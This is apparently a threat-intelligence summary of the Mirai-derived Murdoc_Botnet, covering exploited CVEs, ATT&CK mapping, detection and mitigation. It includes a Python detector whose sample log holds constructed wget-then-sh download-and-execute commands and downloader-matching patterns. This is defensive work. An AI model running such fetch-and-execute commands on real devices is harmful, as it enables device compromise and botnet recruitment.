Full Report
Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc_Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh
Analysis Summary
# Tool/Technique: Murdoc\_Botnet (Mirai Variant)
## Overview
Murdoc\_Botnet is a large-scale botnet campaign identified as a variant of the Mirai malware. Its primary purpose is to compromise Internet of Things (IoT) devices, specifically targeting AVTECH IP cameras and Huawei HG532 routers, to enlist them into a botnet primarily for carrying out Distributed Denial-of-Service (DDoS) attacks.
## Technical Details
- Type: Malware family (Botnet variant, derived from Mirai)
- Platform: IoT Devices (AVTECH IP Cameras, Huawei HG532 routers)
- Capabilities: Exploitation of known vulnerabilities, downloading and executing payloads, and participation in DDoS activities.
- First Seen: Active since at least July 2024.
## MITRE ATT&CK Mapping
The primary activity described falls under Initial Access and Execution, ultimately leading to Impact via DDoS.
- T1190 - Exploit Public-Facing Application (Initial Access)
  - CVE-2017-17215 and CVE-2024-7029 are explicitly leveraged.
- T1059 - Command and Scripting Interpreter (Execution)
  - Involves downloading and executing a shell script to fetch the next-stage payload.
- T1498 - Network Denial of Service (Impact)
  - The end goal of weaponizing the botnet.
## Functionality
### Core Capabilities
- **Exploitation:** Leverages known vulnerabilities in target devices (CVE-2017-17215 and CVE-2024-7029) to achieve initial system compromise.
- **Payload Delivery:** Upon initial access, downloads and executes a shell script.
- **Architecture-Specific Execution:** The shell script fetches the Murdoc\_Botnet malware and executes it according to the CPU architecture of the compromised device.
### Advanced Features
- **Botnet Expansion:** Demonstrates "enhanced capabilities" for establishing expansive botnet networks by consistently exploiting flaws in widely used IoT devices.
- **DDoS Weaponization:** The ultimate purpose of the compromised fleet of devices is to execute DDoS attacks.
## Indicators of Compromise
*Note: No specific file hashes, registry keys, or detailed C2/network indicators were provided in the text, other than the presence of the string "murdoc\_botnet" in compromised systems.*
- File Hashes: [N/A provided]
- File Names: Shell script used for payload fetching; Murdoc\_Botnet malware binary.
- Registry Keys: [N/A provided]
- Network Indicators: [No specific, defanged C2 addresses provided]
- Behavioral Indicators: Successful exploitation of CVE-2017-17215 or CVE-2024-7029 on AVTECH IP cameras or Huawei HG532 routers; detection of the shell script download/execution chain.
## Associated Threat Actors
- No specific threat actor group is named; the activity is attributed only to the unidentified creators/operators of the Murdoc\_Botnet campaign.
## Detection Methods
- Signature-based detection: Matching on file names or hash values associated with the Murdoc\_Botnet payload, where such values are available.
- Behavioral detection: Monitoring for unauthorized download and execution of shell scripts on IoT devices, especially those attempting to run architecture-specific binaries. Network monitoring for high-volume outbound traffic indicative of DDoS activity originating from these devices.
- YARA rules: [N/A provided]
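The behavioral chain described above (download of a shell script, execution of that script, then launch of an architecture-specific binary, plus the "murdoc_botnet" string) can be expressed as a simple check over device command logs. The following Python is an added example, not code from the original report or from Qualys; the log format, host names, IP addresses and the architecture-token heuristic are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed device command logs, NOT captured from a real infection.
# Format per line: "<host> <seq> <command line>"
SAMPLE_LOG = """\
cam01 1 wget http://198.51.100.7/x.sh -O /tmp/x.sh
cam01 2 sh /tmp/x.sh
cam01 3 /tmp/murdoc_botnet.arm7
rtr02 1 ls /var
rtr02 2 curl -o /tmp/update.sh http://203.0.113.9/update.sh
cam03 1 wget http://198.51.100.7/x.sh -O /tmp/x.sh
"""

DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
# Local script path written by a downloader (not the path inside the URL).
LOCAL_SCRIPT = re.compile(r"(?<!\S)(/\S+\.sh)(?!\S)")
# Script run through an interpreter, or invoked directly by path.
EXEC_SCRIPT = re.compile(r"^(?:\S*/)?(?:sh|bash|ash)\s+(/\S+\.sh)(?!\S)|^(/\S+\.sh)(?!\S)")
# Heuristic (assumption): a binary in a writable dir whose name carries a CPU
# architecture token, mirroring the arch-specific execution step in the report.
ARCH_BIN = re.compile(r"^(/(?:tmp|var|dev)/\S*(?:mips|mpsl|arm|x86|i686|sh4|ppc)\S*)")

def parse(log):
    """Yield (host, seq, command) tuples; skip malformed lines."""
    for line in log.splitlines():
        parts = line.split(" ", 2)
        if len(parts) == 3:
            yield parts[0], int(parts[1]), parts[2]

def detect(log):
    """Return (host, seq, reason) alerts: download-then-execute chains,
    architecture-specific binary launches, and the murdoc_botnet string."""
    fetched = defaultdict(set)  # host -> script paths it has downloaded
    alerts = []
    for host, seq, cmd in parse(log):
        if "murdoc_botnet" in cmd.lower():
            alerts.append((host, seq, "murdoc_botnet string in command line"))
        if DOWNLOADER.search(cmd):
            fetched[host].update(LOCAL_SCRIPT.findall(cmd))
        m = EXEC_SCRIPT.match(cmd)
        if m and (m.group(1) or m.group(2)) in fetched[host]:
            alerts.append((host, seq, f"download-then-execute chain: {m.group(1) or m.group(2)}"))
        m = ARCH_BIN.match(cmd)
        if m:
            alerts.append((host, seq, f"arch-specific binary run from writable dir: {m.group(1)}"))
    return alerts

if __name__ == "__main__":
    for host, seq, reason in detect(SAMPLE_LOG):
        print(f"{host} #{seq}: {reason}")
```

A download alone (rtr02, cam03 in the sample) does not alert; only the fetched script being executed on the same host, or an architecture-specific binary being launched, raises an alert.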
## Mitigation Strategies
- **Patching/Updating:** Immediately patch or update AVTECH IP cameras and Huawei HG532 routers to eliminate the vulnerabilities (CVE-2017-17215 and CVE-2024-7029).
- **Network Segmentation:** Isolate IoT devices from critical internal networks.
- **Credential Management:** Ensure default or weak credentials are not in use, as Mirai variants often leverage brute-forcing (even if not explicitly mentioned as the initial vector here).
- **Firewall Rules:** Restrict inbound and outbound access to/from IoT devices to only necessary services.
## Related Tools/Techniques
- Mirai Botnet (Parent malware family)
- gayfemboy (Another recently noted Mirai variant)
- IoT Botnets (General category of malware leveraging weak IoT security)